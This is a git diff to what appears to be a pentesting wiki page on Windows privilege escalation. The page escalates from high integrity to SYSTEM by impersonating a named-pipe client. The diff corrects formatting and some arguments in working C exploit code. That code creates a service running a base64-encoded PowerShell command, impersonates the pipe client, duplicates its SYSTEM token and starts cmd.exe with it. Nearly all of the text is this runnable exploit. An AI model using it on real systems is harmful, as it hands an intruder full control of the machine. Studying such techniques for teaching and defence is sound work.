diff --git a/windows/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md b/windows/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md index f85ab290..b484a68d 100644 --- a/windows/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md +++ b/windows/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md @@ -29,16 +29,16 @@ int ServiceGo(void) { } // create Piper service - scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, - SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, - "C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==", - NULL, NULL, NULL, NULL, NULL); + scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, + SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, + "C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==", + NULL, NULL, NULL, NULL, NULL); if (scService == NULL) { //printf("[!] CreateServiceA() failed: [%d]\n", GetLastError()); return FALSE; } - + // launch it StartService(scService, 0, NULL); @@ -47,12 +47,12 @@ int ServiceGo(void) { DeleteService(scService); CloseServiceHandle(scService); - CloseServiceHandle(scManager); + CloseServiceHandle(scManager); } int main() { - LPCWSTR sPipeName = "\\\\.\\pipe\\piper"; + LPCSTR sPipeName = "\\\\.\\pipe\\piper"; HANDLE hSrvPipe; HANDLE th; BOOL bPipeConn; @@ -65,34 +65,34 @@ int main() { PROCESS_INFORMATION pi; // open pipe - hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT, - PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL); - + hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT, + PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL); + // create and run service - th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) ServiceGo, NULL, 0, 0); - + th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ServiceGo, NULL, 0, 0); + // wait for the connection from the service bPipeConn = ConnectNamedPipe(hSrvPipe, NULL); if (bPipeConn) { ReadFile(hSrvPipe, &pPipeBuf, MESSAGE_SIZE, &dBRead, NULL); - + // impersonate the service (SYSTEM) if (ImpersonateNamedPipeClient(hSrvPipe) == 0) { return -1; } - + // wait for the service to cleanup WaitForSingleObject(th, INFINITE); - + // get a handle to impersonated token if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hImpToken)) { - return -2; - } + return -2; + } // create new primary token for new process if (!DuplicateTokenEx(hImpToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, - TokenPrimary, &hNewToken)) { - return -4; + TokenPrimary, &hNewToken)) { + return -4; } //Sleep(20000); @@ -100,14 +100,14 @@ int main() { ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); ZeroMemory(&pi, sizeof(pi)); - if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, NULL, L"cmd.exe", - NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) { + if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, L"cmd.exe", NULL, + NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) { return -5; } - + // revert back to original security context RevertToSelf(); - + } return 0;